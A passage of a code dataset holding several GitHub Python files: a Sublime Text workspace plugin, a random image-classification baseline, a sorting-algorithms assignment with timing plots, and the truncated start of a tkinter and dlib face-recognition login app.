Arguments:\n filename = workspace file to save\n promptOverwrite = indicates if we should prompt before overwriting a file\n promptSave = indicates if we should prompt before saving a new file\n \"\"\"\n super().run(**kwargs)\n\n # are we saving a new workspace?\n isNewWorkspace = self.window.id() not in EasyWorkspaceCommand._openWorkspaceFiles\n noFileProvided = kwargs.get('filename', None) == None\n\n if isNewWorkspace and noFileProvided:\n # use save-as to get the filename!\n self.window.run_command(\"save_as_easy_workspace\", kwargs)\n\n else:\n self.window.status_message(\"Saving workspace...\")\n\n ws = EasyWorkspace()\n ws.buildFromWindow(self.window)\n\n # resolve the full filepath\n fullFilePath = self.getWorkspaceFilepath(kwargs.get('filename', EasyWorkspaceCommand._openWorkspaceFiles.get(self.window.id())))\n\n # prompt for overwrite or create new\n doSaveDialogResult = sublime.DIALOG_YES\n if (kwargs.get(\"promptOverwrite\", False) and os.path.isfile(fullFilePath)):\n doSaveDialogResult = sublime.yes_no_cancel_dialog(\"Overwrite Easy Workspace?\\n\\n{}\".format(fullFilePath))\n elif (kwargs.get(\"promptSave\", False)):\n doSaveDialogResult = sublime.yes_no_cancel_dialog(\"Save New Workspace?\\n\\n{}\".format(fullFilePath))\n\n # save if not cancelled\n if doSaveDialogResult != sublime.DIALOG_YES:\n self.window.status_message(\"Canceled\")\n else:\n ws.saveToFile(fullFilePath)\n EasyWorkspaceCommand._openWorkspaceFiles[self.window.id()] = fullFilePath\n self.window.status_message(\"Saved \" + fullFilePath)\n\n\n################################################################################\n\nclass SaveAsEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which saves an easy workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Save this window's workspace, prompt for filename if necessary\n\n Arguments:\n filename - if present, will save directly to the provided filename\n without prompting\n \"\"\"\n super().run(**kwargs)\n\n # where do we want to save?\n if kwargs.get(\"filename\", None):\n self.onUserEntersFilename(kwargs.get(\"filename\"))\n else:\n self.window.show_input_panel(\"Save Workspace:\",\n \"\",\n self.onUserEntersFilename,\n None,\n None)\n\n def onUserEntersFilename(self, filename):\n \"\"\" callback when user enters the filename via the input dialog\n\n Arguments:\n filename -- text user entered for filename\n \"\"\"\n userCanceled = filename is None\n if userCanceled:\n self.window.status_message(\"Canceled\")\n else:\n self.window.run_command(\"save_easy_workspace\", dict(filename=filename, promptOverwrite=True))\n\n\n################################################################################\n\nclass OpenEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which opens an easy workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Opens an easy workspace and may prompt user to choose which\n\n * if the current window is empty, will open the workspace in the current window\n * otherwise, the workspace will be opened in a new window\n\n Arguments:\n filename - identifies which workspace to open directly\n \"\"\"\n super().run(**kwargs)\n\n sublime.status_message(\"Opening workspace...\")\n\n # prompt for filename if needed\n filename = kwargs.get('filename', None)\n if not filename:\n # prompt the user for the filename\n # the callback will return to this function from the top with\n # filename specified\n self.promptUserForFilename()\n return\n\n # open in current or new window as needed\n targetWindow = self.window if self.windowEmpty() else self.openNewWindow()\n\n # build and open the workspace\n fullFilePath = self.getWorkspaceFilepath(filename)\n\n ws = EasyWorkspace()\n ws.loadFromFile(fullFilePath)\n ws.applyToWindow(targetWindow)\n\n EasyWorkspaceCommand._openWorkspaceFiles[targetWindow.id()] = fullFilePath\n\n sublime.status_message(\"Opened {}\".format(fullFilePath))\n\n def promptUserForFilename(self):\n \"\"\" prompts a user to select an easyworkspace file from the workspace directory \"\"\"\n workspaceFiles = self.getAllWorkspaceFiles()\n\n # create callback\n def onWorkspaceFileSelected(index):\n noSelection = index < 0\n if noSelection:\n self.window.status_message(\"Canceled\")\n else:\n # rerun the open command with file specified\n self.window.run_command(\"open_easy_workspace\", dict(filename=workspaceFiles[index]))\n self.window.show_quick_panel(workspaceFiles, onWorkspaceFileSelected)\n\n def windowEmpty(self):\n \"\"\" returns true if this command's sublime window is empty \"\"\"\n return len(self.window.views()) == len(self.window.folders()) == 0\n\n def openNewWindow(self):\n \"\"\" opens a new sublime window and returns the resulting handle \"\"\"\n preWindows = sublime.windows()\n sublime.run_command(\"new_window\")\n newWindow = [window for window in sublime.windows() if not window in preWindows][0]\n return newWindow\n\n\n################################################################################\n\nclass DeleteEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which allows a user to delete a workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Delete an easy workspace \"\"\"\n super().run(**kwargs)\n\n # get list of all saved workspaces\n workspaceFiles = self.getAllWorkspaceFiles()\n\n def onWorkspaceFileSelected(index):\n noSelection = index < 0\n if noSelection:\n self.window.status_message(\"Canceled\")\n else:\n fullFilePath = self.getWorkspaceFilepath(workspaceFiles[index])\n\n # are we sure we want to delete?\n if sublime.yes_no_cancel_dialog(\"Delete Workspace {}?\".format(fullFilePath)) == sublime.DIALOG_YES:\n os.remove(fullFilePath)\n self.window.status_message(\"Deleted\")\n else:\n self.window.status_message(\"Canceled\")\n\n # display list to user\n self.window.status_message(\"Deleting workspace...\")\n self.window.show_quick_panel(workspaceFiles, onWorkspaceFileSelected)\n\n\n################################################################################\n\nclass ShowOpenedEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which shows the user this window's current opened workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Show the opened easy workspace \"\"\"\n super().run(**kwargs)\n\n # get open workspace files relative to workspaces directory\n openWorkspaces = {k:v.replace(self.getWorkspacesDir(), \"\") for k,v in EasyWorkspaceCommand._openWorkspaceFiles.items()}\n\n # prepend an \"*\" to our window's open workspace if applicable\n if self.window.id() in openWorkspaces:\n openWorkspaces[self.window.id()] = \" * \" + openWorkspaces[self.window.id()]\n\n # show the open workspaces\n self.window.show_quick_panel(list(openWorkspaces.values()), None)\n\n################################################################################\n\nclass ReopenLastEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which reopens the last easy workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Reopen the last easy workspace \"\"\"\n super().run(**kwargs)\n\n if EasyWorkspaceCommand._reopenWorkspace and os.path.isfile(EasyWorkspaceCommand._reopenWorkspace):\n self.window.run_command(\"open_easy_workspace\", dict(filename=EasyWorkspaceCommand._reopenWorkspace))\n else:\n self.window.status_message(\"Unable to Reopen Workspace \" + EasyWorkspaceCommand._reopenWorkspace)\n\n################################################################################\n# Plugin Listeners\n################################################################################\n\nclass AutoSaveEasyWorkspace(EasyWorkspaceCommand, sublime_plugin.EventListener):\n \"\"\" plugin class which autosaves easy workspaces as needed \"\"\"\n\n def on_window_command(self, window, command_name, args):\n \"\"\" saves the current easy workspace if the user closes part of it \"\"\"\n settings = sublime.load_settings(\"EasyWorkspace.sublime-settings\")\n\n # should we autosave?\n usingEasyWs = window.id() in EasyWorkspaceCommand._openWorkspaceFiles\n saveEnabled = settings.get('easy_ws_save_on', False)\n if not (usingEasyWs and saveEnabled):\n return\n\n #\n # certain commands will prompt EasyWorkspace to autosave the current workspace\n # the following lists highlight these commands, and are ordered for easy\n # comparison of command-setting\n #\n # these commands are considered to 'close' the workspace, and will also\n # store the current workspace to be reopened via the OpenLastWorkspace command\n #\n commandsThatCloseWorkspace = [\"close_folder_list\", \"close_project\",\n \"prompt_open_project_or_workspace\",\n \"prompt_switch_project_or_workspace\",\n \"prompt_select_workspace\",\n \"close_all\", \"close_window\"]\n\n if command_name in commandsThatCloseWorkspace:\n EasyWorkspaceCommand._reopenWorkspace = EasyWorkspaceCommand._openWorkspaceFiles[window.id()]\n\n # Are autosave settings enabled for this command?\n autosaveSettingName = \"easy_ws_save_on_\" + command_name\n if settings.get(autosaveSettingName, False):\n result = window.run_command(\"save_easy_workspace\", dict(promptOverwrite=True, promptSave=True))\n","repo_name":"jmooney/EasyWorkspace-sublime","sub_path":"easy-workspace.py","file_name":"easy-workspace.py","file_ext":"py","file_size_in_byte":21277,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"94"}
+{"seq_id":"8164569476","text":"import os\nimport cv2 as cv\nimport random\nimport time\nseed = random.randint(1, 10000)\nprint('Random seed: {}'.format(seed))\nrandom.seed(seed)\nstart=time.perf_counter()\n#读取图片形成字典\npath=\"scene_categories\"\nfiles=os.listdir(path)\nprint(files)\ni=0\nimg_dict={}\nfor file in files:\n path_img=path+\"/\"+file\n imgs=os.listdir(path_img)\n for img in imgs:\n img_path=path_img+\"/\"+img\n img_dict[str(cv.imread(img_path))]=i\n i=i+1\nprint(len(img_dict))\n# accuracy=0\n# for i in range(100):#随机取出一百张图片,为其分配标签,判断准确率\n# index=random.randint(0,len(img_dict)-1)\n# label=random.randint(0,14)\n# if label==img_dict[list(img_dict.keys())[index]]:\n# accuracy=accuracy+1\n# print(\"随机分类的准确率为\",accuracy/100)\n#生成测试集\naccuracy=[]\ntest_img={}\nnum=0\nfor file in files:\n #从每个场景里取100张图片\n path_img=path+\"/\"+file\n imgs=os.listdir(path_img)\n acc=0\n for i in range(100):\n index=random.randint(0,len(imgs)-1)\n label=random.randint(0,14)\n img_path=path_img+\"/\"+imgs[index]\n test_img[str(cv.imread(img_path))]=label\n if label==num:\n acc=acc+1\n accuracy.append(acc/100)\n num=num+1\ntotal_acc=0\nfor i in range(len(test_img)):\n if img_dict[list(test_img.keys())[i]]==test_img[list(test_img.keys())[i]]:\n total_acc=total_acc+1\nprint(\"每个场景的平均分类准确度为\",accuracy)\nprint(len(test_img))\nprint(\"所有场景的平均分类度为\",total_acc/len(test_img))\nend=time.perf_counter()\nprint(\"运行时间{} s\".format(end-start))","repo_name":"BaiZe337/CV","sub_path":"图像分类_随机分类.py","file_name":"图像分类_随机分类.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"27513443500","text":"import json\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import uniform, randint, choice\nfrom os.path import exists\nfrom timeit import default_timer as timer\nfrom math import sqrt, ceil\n\n\nclass Robot:\n def __init__(self, typ, price, range_, camera):\n self.type_ = typ\n self.price = price\n self.range_ = range_\n self.camera = camera\n\n\nclass Factory:\n def __init__(self):\n self.robo_lst = []\n\n def createRobo(self, cnt):\n self.robo_lst = [Robot(typ=choice([\"AGV\", \"AFV\", \"ASV\", \"AUV\"]),\n price=round(uniform(0, 10000), 2),\n range_=randint(0, 100),\n camera=randint(0, 1))\n for i in range(cnt)]\n\n def moveRobo(self):\n print(f\"+{'-' * 5}+{'-' * 14}+{'-' * 8}+{'-' * 8}+\")\n print(f\"|{' ' * 1}TYP{' ' * 1}|\"\n f\"{' ' * 4}PRICE{' ' * 5}|\"\n f\"{' ' * 2}RANGE{' ' * 1}|\"\n f\"{' ' * 2}CAM{' ' * 3}|\")\n for robot in self.robo_lst:\n x = len(f\"{robot.price : 0.2f}\")\n print(f\"+{'-' * 5}+{'-' * 14}+{'-' * 8}+{'-' * 8}+\")\n print(f\"|{' ' * 1}{robot.type_}{' ' * 1}|\"\n f\"{' ' * (10 - x)}{robot.price : 0.2f}{' ' * 1}zł{' ' * 1}|\"\n f\"{' ' * (4 - len(str(robot.range_)))}{robot.range_}{' ' * 1}km{' ' * 1}|\"\n f\"{' ' * 2}{'jest' if robot.camera == 0 else 'brak'}{' ' * 2}|\")\n\n def saveRobo(self, location):\n payload = [{\"typ\": robot.type_, \"price\": robot.price, \"range_\": robot.range_,\n \"camera\": robot.camera} for robot in self.robo_lst]\n with open(f\"./{location}.json\", \"w\") as f:\n json.dump(payload, f, indent=4)\n\n def readRobo(self, location):\n if not exists(f\"./{location}.json\"):\n raise FileNotFoundError\n else:\n with open(f\"./{location}.json\", \"r\") as f:\n dane = json.load(f)\n self.robo_lst = [Robot(robot[\"typ\"], robot[\"price\"], robot[\"range_\"], robot[\"camera\"])\n for robot in dane]\n\n\n# Heapsort with steps\ndef stepheapify(arr, n, i, steps):\n pivot = i\n l = 2 * i + 1\n r = 2 * i + 2\n steps.append([steps[-1][0] + 1,\n f\"Is left = {l} less than the length of the list = {n} and is the price of the pivot less than the \"\n f\"price of the left?\",\n steps[-1][2].copy()])\n if l < n and arr[pivot].price < arr[l].price:\n pivot = l\n steps.append([steps[-1][0] + 1, \"Yes, change the pivot to the number l\", steps[-1][2].copy()])\n else:\n steps.append([steps[-1][0] + 1, \"No, proceed further\", steps[-1][2].copy()])\n\n steps.append([steps[-1][0] + 1,\n f\"Is right = {r} less than the length of the list = {n} and is the price of the pivot less than the \"\n f\"price of the right?\",\n steps[-1][2].copy()])\n if r < n and arr[pivot].price < arr[r].price:\n pivot = r\n steps.append([steps[-1][0] + 1, \"Yes, change the pivot to the number r\", steps[-1][2].copy()])\n else:\n steps.append([steps[-1][0] + 1, \"No, move over\", steps[-1][2]].copy())\n\n steps.append([steps[-1][0] + 1, f\"Did pivot change?\", steps[-1][2]].copy())\n if pivot != i:\n arr[i], arr[pivot] = arr[pivot], arr[i]\n temp = steps[-1][2].copy()\n temp[i], temp[pivot] = temp[pivot], temp[i]\n steps.append([steps[-1][0] + 1, \"Yes, swap them and repeat the heapification\", temp])\n stepheapify(arr, n, pivot, steps)\n else:\n steps.append([steps[-1][0] + 1, \"No, leave the heap\", steps[-1][2].copy()])\n\n\ndef stepheapsort(arr, steps):\n n = len(arr)\n for i in range(n // 2 - 1, -1, -1):\n stepheapify(arr, n, i, steps)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n temp = steps[-1][2].copy()\n temp[0], temp[i] = temp[i], temp[0]\n steps.append([steps[-1][0] + 1, f\"Swap the start and the i-th position = {i}\", temp])\n stepheapify(arr, i, 0, steps)\n\n\ndef stepheap(arr):\n w = [a.price for a in arr]\n x = np.argsort(np.argsort(w))\n y = [[0, \"Start\", x]]\n stepheapsort(arr, y)\n for el in y:\n print(f\"{el[0]}. {el[1]}\")\n print(f\"{el[2]}\")\n\n\n# Heapsort bez kroków\ndef heapify(arr, n, i):\n pivot = i\n l = 2 * i + 1\n r = 2 * i + 2\n\n if l < n and arr[pivot].price < arr[l].price:\n pivot = l\n\n if r < n and arr[pivot].price < arr[r].price:\n pivot = r\n\n if pivot != i:\n arr[i], arr[pivot] = arr[pivot], arr[i]\n heapify(arr, n, pivot)\n\n\ndef heapsort(arr):\n n = len(arr)\n for i in range(n // 2 - 1, -1, -1):\n heapify(arr, n, i)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n heapify(arr, i, 0)\n\n\n# Quicksort z krokami\n\ndef steppartition(arr, l, r, steps):\n pivot = arr[r].price\n x = l - 1\n for y in range(l, r):\n steps.append(\n [steps[-1][0] + 1, f\"Is walking through the loop {arr[y].price} less than or equal to the pivot = {pivot}?\",\n steps[-1][2].copy()])\n if arr[y].price <= pivot:\n x += 1\n arr[x], arr[y] = arr[y], arr[x]\n temp = steps[-1][2].copy()\n temp[x], temp[y] = temp[y], temp[x]\n steps.append(\n [steps[-1][0] + 1,\n f\"Yes, increase the low index by one and swap its value with the value at the loop index\", temp])\n else:\n steps.append(\n [steps[-1][0] + 1, f\"No, move over\", steps[-1][2].copy()])\n\n arr[x + 1], arr[r] = arr[r], arr[x + 1]\n temp = steps[-1][2].copy()\n temp[x + 1], temp[r] = temp[r], temp[x + 1]\n steps.append(\n [steps[-1][0] + 1, f\"Swap the values at low index + 1 and high index, and return low index + 1\", temp])\n return x + 1\n\n\ndef stepquicksort(arr, l, r, steps):\n steps.append([steps[-1][0] + 1, f\"Is the low value = {l} less than the high value = {r}?\", steps[-1][2].copy()])\n if l < r:\n steps.append(\n [steps[-1][0] + 1, f\"Yes, we find the partition position.\", steps[-1][2].copy()])\n p = steppartition(arr, l, r, steps)\n stepquicksort(arr, l, p - 1, steps)\n stepquicksort(arr, p + 1, r, steps)\n else:\n steps.append(\n [steps[-1][0] + 1, \"No, leave this section untouched\", steps[-1][2].copy()])\n\n\ndef stepquick(arr):\n w = [a.price for a in arr]\n x = np.argsort(np.argsort(w))\n y = [[0, \"Start\", x]]\n stepquicksort(arr, 0, len(arr) - 1, y)\n for el in y:\n print(f\"{el[0]}. {el[1]}\")\n print(f\"{el[2]}\")\n\n\n# Quicksort without steps\n\ndef partition(arr, l, r):\n pivot = arr[r].price\n x = l - 1\n for y in range(l, r):\n if arr[y].price <= pivot:\n x += 1\n arr[x], arr[y] = arr[y], arr[x]\n arr[x + 1], arr[r] = arr[r], arr[x + 1]\n return x + 1\n\n\ndef quicksort(arr, l, r):\n if l < r:\n p = partition(arr, l, r)\n quicksort(arr, l, p - 1)\n quicksort(arr, p + 1, r)\n\n\n# Countsort\ndef countsort(arr):\n count = [0 for _ in range(101)]\n for r in arr:\n count[r.range_] += 1\n for i in range(1, 101):\n count[i] += count[i - 1]\n\n out = [None] * len(arr)\n for i in range(len(arr) - 1, -1, -1):\n z = arr[i].range_\n count[z] -= 1\n pos = count[z]\n out[pos] = arr[i]\n return out\n\n\n# Radixsort\n\ndef radixsort(matrix, col=0):\n if col >= len(matrix[0]):\n return matrix\n max_val = max(row[col] for row in matrix)\n exp = 1 # 10^(exp-1)\n\n while max_val // exp > 0:\n matrix = countingsort(matrix, col, exp)\n exp *= 10\n\n # Moving through columns if they are identical\n idx = 0\n while idx < len(matrix):\n end = idx + 1\n while end < len(matrix) and matrix[idx][0:col + 1] == matrix[end][0:col + 1]:\n # The above loop checks if there is a repeated value between the row with id and the row with end for\n # the first col columns. If so, it creates a new matrix containing those rows and passes it to radix,\n # shifting the current column one step to the right.\n end += 1\n group = matrix[idx:end]\n if len(group) > 1: # Check if the group consists of more than one row\n matrix[idx:end] = radixsort(group, col + 1)\n idx = end\n return matrix\n\n\ndef countingsort(matrix, col, exp):\n count = [0] * 10 # 10 digits\n out = [0] * len(matrix)\n\n for row in matrix:\n digit = (row[col] // exp) % 10\n count[digit] += 1\n\n for i in range(1, 10):\n count[i] += count[i - 1]\n\n for row in reversed(matrix):\n digit = (row[col] // exp) % 10\n count[digit] -= 1\n out[count[digit]] = row\n\n return out\n\n\ndef plot(f: Factory, n=1000):\n t_heap, t_quick, t_count, t_radix = [], [], [], []\n robot_arr = [_ for _ in range(10, n + 1, 10)]\n for i in robot_arr:\n print(i)\n f.createRobo(i)\n\n start = timer()\n heapsort(f.robo_lst.copy())\n t_heap.append(timer() - start)\n\n start = timer()\n quicksort(f.robo_lst.copy(), 0, len(f.robo_lst) - 1)\n t_quick.append(timer() - start)\n\n start = timer()\n countsort(f.robo_lst)\n t_count.append(timer() - start)\n\n ceilsqrt = ceil(sqrt(i))\n matrix = [[randint(0, ceilsqrt) for _ in range(i)] for __ in range(i)]\n start = timer()\n radixsort(matrix)\n t_radix.append(timer() - start)\n\n fig, ax = plt.subplots()\n ax.plot(robot_arr, t_heap, c=\"red\", label=\"Heapsort\")\n ax.plot(robot_arr, t_quick, c=\"green\", label=\"Quicksort\")\n ax.plot(robot_arr, t_count, c=\"blue\", label=\"Countsort\")\n ax.plot(robot_arr, t_radix, c=\"black\", label=\"Radixsort\")\n plt.legend()\n plt.show()\n\n\nf = Factory()\n\n\ndef zad1():\n f.createRobo(10)\n stepheap(f.robo_lst)\n f.moveRobo()\n\n\ndef zad2():\n f.createRobo(10)\n stepquick(f.robo_lst)\n f.moveRobo()\n\n\ndef zad3():\n f.createRobo(10)\n f.robo_lst = countsort(f.robo_lst)\n f.moveRobo()\n\n\ndef zad4():\n tab = [\n [1, 2, 3, 4],\n [7, 8, 10, 10],\n [5, 2, 1, 3],\n [7, 6, 10, 12],\n [7, 8, 10, 13],\n [2, 1, 3, 7]\n ]\n tab = radixsort(tab)\n for row in tab:\n print(row)\n\n\ndef zad5():\n plot(f)\n\n\n#zad1()\nzad5()\n","repo_name":"kobala58/PWR","sub_path":"projektowanie_algorytmow/L9.py","file_name":"L9.py","file_ext":"py","file_size_in_byte":10437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"16460351860","text":"from tkinter import PhotoImage\r\nimport datetime\r\nimport tkinter as tk\r\nimport cv2\r\nfrom PIL import Image, ImageTk\r\nimport util\r\nimport sqlite3 \r\nimport dlib\r\nfrom tkinter import messagebox\r\nimport numpy as np\r\nimport pandas as pd\r\nimport customtkinter\r\nimport cv2\r\n\r\nclass App:\r\n def __init__(self):\r\n self.flag=False\r\n self.current_time = datetime.datetime.now()\r\n self.cascPath =\"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/haarcascade_frontalface_default.xml\"\r\n self.faceCascade = cv2.CascadeClassifier(self.cascPath)\r\n self.font = cv2.QT_FONT_NORMAL\r\n self.first_window = tk.Tk()\r\n self.first_window.geometry(\"1100x600+350+100\")\r\n self.first_window.resizable(width=False,height=False)\r\n self.first_window.title(\"FacialRecognition\")\r\n self.face_detector = dlib.get_frontal_face_detector()\r\n self.face_recognizer = dlib.face_recognition_model_v1(\"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/dlib_face_recognition_resnet_model_v1.dat\")\r\n self.shape_predictor = dlib.shape_predictor(\"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/shape_predictor_68_face_landmarks.dat\")\r\n self.conn = sqlite3.connect(\"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/maindatabase\")\r\n self.c = self.conn.cursor()\r\n self.d = self.conn.cursor()\r\n self.e=self.conn.cursor()\r\n self.c.execute(\"CREATE TABLE IF NOT EXISTS users (id INTEGER PRIMARY KEY,username TEXT, face_descriptor TEXT)\")\r\n self.d.execute(\"CREATE TABLE IF NOT EXISTS logs (id INTEGER ,logintime_time DATETIME,logouttime_time DATETIME)\")\r\n self.image_pathnew = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/first.png\" \r\n self.imagenew = PhotoImage(file=self.image_pathnew)\r\n\r\n self.image_labelnew = tk.Label(self.first_window, image=self.imagenew)\r\n self.image_labelnew.pack()\r\n self.image_labelnew.place(x=0, y=0, width=1100, height=600)\r\n \r\n self.login_button_first_window=customtkinter.CTkButton(master=self.first_window, text=\"Proceed\", command=self.main,height=80,width=325,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.login_button_first_window.place(x=375, y=255)\r\n def main(self):\r\n self.main_window= tk.Toplevel(self.first_window)\r\n self.main_window.geometry(\"1100x600+350+100\")\r\n self.main_window.resizable(width=False,height=False)\r\n self.main_window.title(\"FacialRecognition\")\r\n self.main_window.configure(background=\"white\")\r\n self.image_path = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/logo2.png\" \r\n self.image = PhotoImage(file=self.image_path)\r\n\r\n self.image_label = tk.Label(self.main_window, image=self.image)\r\n self.image_label.pack()\r\n self.image_label.place(x=0, y=0, width=1100, height=600)\r\n \r\n self.login_button_main_window=customtkinter.CTkButton(master=self.main_window, text=\"Login\", command=self.login,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#64AFFF\",fg_color=\"#109945\")\r\n self.login_button_main_window.place(x=760, y=100)\r\n self.logout_button_main_window = customtkinter.CTkButton(master=self.main_window, text=\"Logout\", command=self.logout,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#64AFFF\",fg_color=\"#109945\")\r\n self.logout_button_main_window.place(x=760, y=180)\r\n self.face_descriptor=0\r\n \r\n\r\n self.register_new_user_button_main_window = customtkinter.CTkButton(master=self.main_window, text=\"Admin\", command=self.checkadmin,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#2e2e2e\")\r\n self.register_new_user_button_main_window.place(x=760, y=430)\r\n self.webcam_label = util.get_img_label(self.main_window)\r\n self.webcam_label.place(x=30, y=90, width=640, height=400)\r\n\r\n self.add_webcam(self.webcam_label)\r\n \r\n def reg(self):\r\n self.main_window.destroy()\r\n self.adminmain_window= tk.Toplevel(self.first_window)\r\n self.adminimage_path = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/reg.png\"\r\n self.adminmain_window.geometry(\"1100x600+350+100\")\r\n self.adminmain_window.resizable(width=False,height=False)\r\n self.adminimage = PhotoImage(file=self.adminimage_path)\r\n self.adminimage_label = tk.Label(self.adminmain_window, image=self.adminimage)\r\n self.adminimage_label.pack()\r\n self.adminimage_label.place(x=0, y=0, width=1100, height=600)\r\n self.adminwebcam_label = util.get_img_label(self.adminmain_window)\r\n self.adminwebcam_label.place(x=30, y=90, width=640, height=400)\r\n self.add_webcam (self.adminwebcam_label)\r\n self.accept_button_register_new_user_window = customtkinter.CTkButton(master=self.adminmain_window, text=\"Register\", command=self.accept_register_new_user,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#64AFFF\",fg_color=\"#109945\")\r\n self.accept_button_register_new_user_window.place(x=775, y=370)\r\n \r\n\r\n self.name=customtkinter.CTkEntry(self.adminmain_window,width=340, font=('Sans-serif', 18),corner_radius=20,placeholder_text=\"\",bg_color=\"#7BC2FF\",fg_color=\"#224957\")\r\n self.name.place(x=730, y=190)\r\n\r\n self.empid=customtkinter.CTkEntry(self.adminmain_window,width=340, font=('Sans-serif', 18),corner_radius=20,placeholder_text=\"\",bg_color=\"#7BC2FF\",fg_color=\"#224957\")\r\n self.empid.place(x=730, y=280)\r\n\r\n def captureface(self,username,empid):\r\n if self.flag==True:\r\n self.c.execute(\"SELECT rowid FROM users WHERE id = ?\", (empid,))\r\n self.db_result=self.c.fetchone()\r\n if (self.db_result is None): \r\n ret, frame = self.cap.read()\r\n self.current_time = datetime.datetime.now()\r\n self.most_recent_capture_arr = frame\r\n while True:\r\n \r\n self.gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n \r\n self.dets = self.face_detector(self.gray, 1)\r\n if len(self.dets) == 1:\r\n self.shape = self.shape_predictor(self.gray, self.dets[0])\r\n self.face_descriptor = self.face_recognizer.compute_face_descriptor(frame, self.shape)\r\n self.face_descriptor_str = ','.join(str(e) for e in self.face_descriptor)\r\n\r\n self.c.execute(\"INSERT INTO users (id,username, face_descriptor) VALUES (?,?, ?)\", (empid,username, self.face_descriptor_str))\r\n self.conn.commit()\r\n \r\n messagebox.showinfo(\"Success\", \"Face captured successfully!\",parent= self.adminmain_window)\r\n\r\n self.adminmain_window.destroy()\r\n return\r\n else:\r\n messagebox.showinfo(\"Error\",\"EmpID already exists\",parent= self.adminmain_window)\r\n return\r\n else:\r\n messagebox.showinfo(\"Error\",\"Please fix lighting or position of face, till rectangle around face is visible\",parent= self.adminmain_window)\r\n def add_webcam(self, label):\r\n\r\n if 'cap' not in self.__dict__:\r\n self.cap = cv2.VideoCapture(0)\r\n\r\n self._label = label\r\n self.process_webcam()\r\n \r\n def process_webcam(self):\r\n \r\n ret, frame = self.cap.read()\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n self.most_recent_capture_arr = frame\r\n img_ = cv2.cvtColor(self.most_recent_capture_arr, cv2.COLOR_BGR2RGB)\r\n self.most_recent_capture_pil = Image.fromarray(img_)\r\n imgtk = ImageTk.PhotoImage(image=self.most_recent_capture_pil)\r\n self._label.imgtk = imgtk\r\n self._label.configure(image=imgtk)\r\n self.flag=False\r\n faces = self.faceCascade.detectMultiScale(\r\n gray,\r\n scaleFactor=1.1,\r\n minNeighbors=5,\r\n minSize=(200, 200),\r\n flags=cv2.CASCADE_SCALE_IMAGE\r\n \r\n )\r\n\r\n # Draw a rectangle around the faces\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 128, 0), 3)\r\n self.roi_gray = gray[y:y+h, x:x+w]\r\n self.roi_color = frame[y:y+h, x:x+w]\r\n cv2.putText(frame,'PROCEED',(x, y-6), self.font, 2,(255,0, 0),2)\r\n img_ = cv2.cvtColor(self.most_recent_capture_arr, cv2.COLOR_BGR2RGB)\r\n self.most_recent_capture_pil = Image.fromarray(img_)\r\n imgtk = ImageTk.PhotoImage(image=self.most_recent_capture_pil)\r\n self._label.imgtk = imgtk\r\n self._label.configure(image=imgtk)\r\n self.flag=True\r\n self._label.after(20, self.process_webcam)\r\n\r\n def checkadmin(self):\r\n\r\n self.checkadmin_newwindow= tk.Toplevel(self.first_window)\r\n self.checkadmin_newwindow.geometry(\"1100x600+350+100\")\r\n self.image_path1 = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/logo3.png\" \r\n self.image1 = PhotoImage(file=self.image_path1)\r\n self.image_label1 = tk.Label(self.checkadmin_newwindow, image=self.image1)\r\n self.image_label1.pack()\r\n self.image_label1.place(x=0, y=0, width=1100, height=600)\r\n \r\n self.adminusername = customtkinter.CTkEntry(self.checkadmin_newwindow,width=380, font=('Sans-serif', 18),corner_radius=20,placeholder_text=\"\",bg_color=\"#7BC2FF\",fg_color=\"#224957\")\r\n self.adminusername.place(x=368, y=260)\r\n \r\n\r\n self.adminpass = customtkinter.CTkEntry(self.checkadmin_newwindow,width=380, font=('Sans-serif', 18),corner_radius=20,placeholder_text=\"\",bg_color=\"#7BC2FF\",fg_color=\"#224957\",show=\"*\")\r\n self.adminpass.place(x=368, y=335)\r\n\r\n self.accept_button_admincheck = customtkinter.CTkButton(master=self.checkadmin_newwindow, text=\"Login\", 